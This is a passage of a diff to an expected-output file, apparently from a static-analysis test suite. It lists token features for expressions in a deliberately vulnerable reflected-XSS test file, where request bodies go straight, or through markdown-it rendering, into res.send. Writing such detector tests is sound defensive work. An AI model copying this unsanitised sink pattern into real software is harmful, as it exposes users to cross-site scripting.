| res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:96:37:96:39 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:96:37:96:39 | res | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:96:37:96:39 | res | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:97:3:97:5 | res | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:97:3:97:5 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:97:3:97:5 | res | enclosingFunctionBody | req res res send req body res send markdownIt render req body res send markdownIt2 render req body res send markdownIt3 render req body res send markdownIt use require markdown-it-sanitizer render req body res send markdownIt use require markdown-it-abbr use unknown render req body | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:97:3:97:5 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:97:3:97:5 | res | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:97:3:97:10 | res.send | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:97:3:97:10 | res.send | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:97:3:97:10 | res.send | enclosingFunctionBody | req res res send req body res send markdownIt render req body res send markdownIt2 render req body res send markdownIt3 render req body res send markdownIt use require markdown-it-sanitizer render req body res send markdownIt use require markdown-it-abbr use unknown render req body | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:97:3:97:10 | res.send | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:97:3:97:10 | res.send | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:97:3:97:20 | exceptional return of res.send(req.body) | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:97:3:97:20 | exceptional return of res.send(req.body) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:97:3:97:20 | exceptional return of res.send(req.body) | enclosingFunctionBody | req res res send req body res send markdownIt render req body res send markdownIt2 render req body res send markdownIt3 render req body res send markdownIt use require markdown-it-sanitizer render req body res send markdownIt use require markdown-it-abbr use unknown render req body | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:97:3:97:20 | exceptional return of res.send(req.body) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:97:3:97:20 | exceptional return of res.send(req.body) | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:97:3:97:20 | res.send(req.body) | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:97:3:97:20 | res.send(req.body) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:97:3:97:20 | res.send(req.body) | enclosingFunctionBody | req res res send req body res send markdownIt render req body res send markdownIt2 render req body res send markdownIt3 render req body res send markdownIt use require markdown-it-sanitizer render req body res send markdownIt use require markdown-it-abbr use unknown render req body | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:97:3:97:20 | res.send(req.body) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:97:3:97:20 | res.send(req.body) | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:97:7:97:10 | send | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:97:7:97:10 | send | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:97:7:97:10 | send | enclosingFunctionBody | req res res send req body res send markdownIt render req body res send markdownIt2 render req body res send markdownIt3 render req body res send markdownIt use require markdown-it-sanitizer render req body res send markdownIt use require markdown-it-abbr use unknown render req body | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:97:7:97:10 | send | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:97:7:97:10 | send | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:97:12:97:14 | req | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:97:12:97:14 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:97:12:97:14 | req | enclosingFunctionBody | req res res send req body res send markdownIt render req body res send markdownIt2 render req body res send markdownIt3 render req body res send markdownIt use require markdown-it-sanitizer render req body res send markdownIt use require markdown-it-abbr use unknown render req body | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:97:12:97:14 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:97:12:97:14 | req | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:97:12:97:19 | req.body | CalleeFlexibleAccessPath | res.send | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:97:12:97:19 | req.body | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:97:12:97:19 | req.body | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | @@ -20138,6 +134643,51 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/ReflectedXss.js:97:12:97:19 | req.body | enclosingFunctionName | app.get#functionalargument | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:97:12:97:19 | req.body | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:97:12:97:19 | req.body | receiverName | res | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:97:16:97:19 | body | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:97:16:97:19 | body | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:97:16:97:19 | body | enclosingFunctionBody | req res res send req body res send markdownIt render req body res send markdownIt2 render req body res send markdownIt3 render req body res send markdownIt use require markdown-it-sanitizer render req body res send markdownIt use require markdown-it-abbr use unknown render req body | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:97:16:97:19 | body | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:97:16:97:19 | body | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:98:3:98:5 | res | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:98:3:98:5 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:98:3:98:5 | res | enclosingFunctionBody | req res res send req body res send markdownIt render req body res send markdownIt2 render req body res send markdownIt3 render req body res send markdownIt use require markdown-it-sanitizer render req body res send markdownIt use require markdown-it-abbr use unknown render req body | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:98:3:98:5 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:98:3:98:5 | res | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:98:3:98:10 | res.send | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:98:3:98:10 | res.send | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:98:3:98:10 | res.send | enclosingFunctionBody | req res res send req body res send markdownIt render req body res send markdownIt2 render req body res send markdownIt3 render req body res send markdownIt use require markdown-it-sanitizer render req body res send markdownIt use require markdown-it-abbr use unknown render req body | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:98:3:98:10 | res.send | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:98:3:98:10 | res.send | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:98:3:98:39 | exceptional return of res.sen ... .body)) | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:98:3:98:39 | exceptional return of res.sen ... .body)) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:98:3:98:39 | exceptional return of res.sen ... .body)) | enclosingFunctionBody | req res res send req body res send markdownIt render req body res send markdownIt2 render req body res send markdownIt3 render req body res send markdownIt use require markdown-it-sanitizer render req body res send markdownIt use require markdown-it-abbr use unknown render req body | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:98:3:98:39 | exceptional return of res.sen ... .body)) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:98:3:98:39 | exceptional return of res.sen ... .body)) | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:98:3:98:39 | res.sen ... .body)) | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:98:3:98:39 | res.sen ... .body)) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:98:3:98:39 | res.sen ... .body)) | enclosingFunctionBody | req res res send req body res send markdownIt render req body res send markdownIt2 render req body res send markdownIt3 render req body res send markdownIt use require markdown-it-sanitizer render req body res send markdownIt use require markdown-it-abbr use unknown render req body | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:98:3:98:39 | res.sen ... .body)) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:98:3:98:39 | res.sen ... .body)) | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:98:7:98:10 | send | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:98:7:98:10 | send | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:98:7:98:10 | send | enclosingFunctionBody | req res res send req body res send markdownIt render req body res send markdownIt2 render req body res send markdownIt3 render req body res send markdownIt use require markdown-it-sanitizer render req body res send markdownIt use require markdown-it-abbr use unknown render req body | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:98:7:98:10 | send | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:98:7:98:10 | send | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:98:12:98:21 | markdownIt | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:98:12:98:21 | markdownIt | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:98:12:98:21 | markdownIt | enclosingFunctionBody | req res res send req body res send markdownIt render req body res send markdownIt2 render req body res send markdownIt3 render req body res send markdownIt use require markdown-it-sanitizer render req body res send markdownIt use require markdown-it-abbr use unknown render req body | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:98:12:98:21 | markdownIt | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:98:12:98:21 | markdownIt | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:98:12:98:28 | markdownIt.render | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:98:12:98:28 | markdownIt.render | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:98:12:98:28 | markdownIt.render | enclosingFunctionBody | req res res send req body res send markdownIt render req body res send markdownIt2 render req body res send markdownIt3 render req body res send markdownIt use require markdown-it-sanitizer render req body res send markdownIt use require markdown-it-abbr use unknown render req body | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:98:12:98:28 | markdownIt.render | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:98:12:98:28 | markdownIt.render | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:98:12:98:38 | exceptional return of markdow ... q.body) | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:98:12:98:38 | exceptional return of markdow ... q.body) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:98:12:98:38 | exceptional return of markdow ... q.body) | enclosingFunctionBody | req res res send req body res send markdownIt render req body res send markdownIt2 render req body res send markdownIt3 render req body res send markdownIt use require markdown-it-sanitizer render req body res send markdownIt use require markdown-it-abbr use unknown render req body | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:98:12:98:38 | exceptional return of markdow ... q.body) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:98:12:98:38 | exceptional return of markdow ... q.body) | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:98:12:98:38 | markdow ... q.body) | CalleeFlexibleAccessPath | res.send | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:98:12:98:38 | markdow ... q.body) | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:98:12:98:38 | markdow ... q.body) | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | @@ -20146,6 +134696,16 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/ReflectedXss.js:98:12:98:38 | markdow ... q.body) | enclosingFunctionName | app.get#functionalargument | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:98:12:98:38 | markdow ... q.body) | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:98:12:98:38 | markdow ... q.body) | receiverName | res | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:98:23:98:28 | render | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:98:23:98:28 | render | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:98:23:98:28 | render | enclosingFunctionBody | req res res send req body res send markdownIt render req body res send markdownIt2 render req body res send markdownIt3 render req body res send markdownIt use require markdown-it-sanitizer render req body res send markdownIt use require markdown-it-abbr use unknown render req body | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:98:23:98:28 | render | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:98:23:98:28 | render | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:98:30:98:32 | req | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:98:30:98:32 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:98:30:98:32 | req | enclosingFunctionBody | req res res send req body res send markdownIt render req body res send markdownIt2 render req body res send markdownIt3 render req body res send markdownIt use require markdown-it-sanitizer render req body res send markdownIt use require markdown-it-abbr use unknown render req body | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:98:30:98:32 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:98:30:98:32 | req | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:98:30:98:37 | req.body | CalleeFlexibleAccessPath | markdownIt.render | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:98:30:98:37 | req.body | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:98:30:98:37 | req.body | calleeImports | markdown-it | @@ -20155,6 +134715,51 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/ReflectedXss.js:98:30:98:37 | req.body | enclosingFunctionName | app.get#functionalargument | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:98:30:98:37 | req.body | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:98:30:98:37 | req.body | receiverName | markdownIt | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:98:34:98:37 | body | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:98:34:98:37 | body | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:98:34:98:37 | body | enclosingFunctionBody | req res res send req body res send markdownIt render req body res send markdownIt2 render req body res send markdownIt3 render req body res send markdownIt use require markdown-it-sanitizer render req body res send markdownIt use require markdown-it-abbr use unknown render req body | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:98:34:98:37 | body | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:98:34:98:37 | body | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:99:3:99:5 | res | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:99:3:99:5 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:99:3:99:5 | res | enclosingFunctionBody | req res res send req body res send markdownIt render req body res send markdownIt2 render req body res send markdownIt3 render req body res send markdownIt use require markdown-it-sanitizer render req body res send markdownIt use require markdown-it-abbr use unknown render req body | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:99:3:99:5 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:99:3:99:5 | res | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:99:3:99:10 | res.send | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:99:3:99:10 | res.send | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:99:3:99:10 | res.send | enclosingFunctionBody | req res res send req body res send markdownIt render req body res send markdownIt2 render req body res send markdownIt3 render req body res send markdownIt use require markdown-it-sanitizer render req body res send markdownIt use require markdown-it-abbr use unknown render req body | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:99:3:99:10 | res.send | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:99:3:99:10 | res.send | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:99:3:99:40 | exceptional return of res.sen ... .body)) | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:99:3:99:40 | exceptional return of res.sen ... .body)) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:99:3:99:40 | exceptional return of res.sen ... .body)) | enclosingFunctionBody | req res res send req body res send markdownIt render req body res send markdownIt2 render req body res send markdownIt3 render req body res send markdownIt use require markdown-it-sanitizer render req body res send markdownIt use require markdown-it-abbr use unknown render req body | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:99:3:99:40 | exceptional return of res.sen ... .body)) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:99:3:99:40 | exceptional return of res.sen ... .body)) | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:99:3:99:40 | res.sen ... .body)) | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:99:3:99:40 | res.sen ... .body)) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:99:3:99:40 | res.sen ... .body)) | enclosingFunctionBody | req res res send req body res send markdownIt render req body res send markdownIt2 render req body res send markdownIt3 render req body res send markdownIt use require markdown-it-sanitizer render req body res send markdownIt use require markdown-it-abbr use unknown render req body | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:99:3:99:40 | res.sen ... .body)) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:99:3:99:40 | res.sen ... .body)) | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:99:7:99:10 | send | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:99:7:99:10 | send | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:99:7:99:10 | send | enclosingFunctionBody | req res res send req body res send markdownIt render req body res send markdownIt2 render req body res send markdownIt3 render req body res send markdownIt use require markdown-it-sanitizer render req body res send markdownIt use require markdown-it-abbr use unknown render req body | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:99:7:99:10 | send | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:99:7:99:10 | send | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:99:12:99:22 | markdownIt2 | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:99:12:99:22 | markdownIt2 | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:99:12:99:22 | markdownIt2 | enclosingFunctionBody | req res res send req body res send markdownIt render req body res send markdownIt2 render req body res send markdownIt3 render req body res send markdownIt use require markdown-it-sanitizer render req body res send markdownIt use require markdown-it-abbr use unknown render req body | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:99:12:99:22 | markdownIt2 | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:99:12:99:22 | markdownIt2 | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:99:12:99:29 | markdownIt2.render | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:99:12:99:29 | markdownIt2.render | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:99:12:99:29 | markdownIt2.render | enclosingFunctionBody | req res res send req body res send markdownIt render req body res send markdownIt2 render req body res send markdownIt3 render req body res send markdownIt use require markdown-it-sanitizer render req body res send markdownIt use require markdown-it-abbr use unknown render req body | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:99:12:99:29 | markdownIt2.render | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:99:12:99:29 | markdownIt2.render | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:99:12:99:39 | exceptional return of markdow ... q.body) | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:99:12:99:39 | exceptional return of markdow ... q.body) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:99:12:99:39 | exceptional return of markdow ... q.body) | enclosingFunctionBody | req res res send req body res send markdownIt render req body res send markdownIt2 render req body res send markdownIt3 render req body res send markdownIt use require markdown-it-sanitizer render req body res send markdownIt use require markdown-it-abbr use unknown render req body | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:99:12:99:39 | exceptional return of markdow ... q.body) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:99:12:99:39 | exceptional return of markdow ... q.body) | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:99:12:99:39 | markdow ... q.body) | CalleeFlexibleAccessPath | res.send | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:99:12:99:39 | markdow ... q.body) | 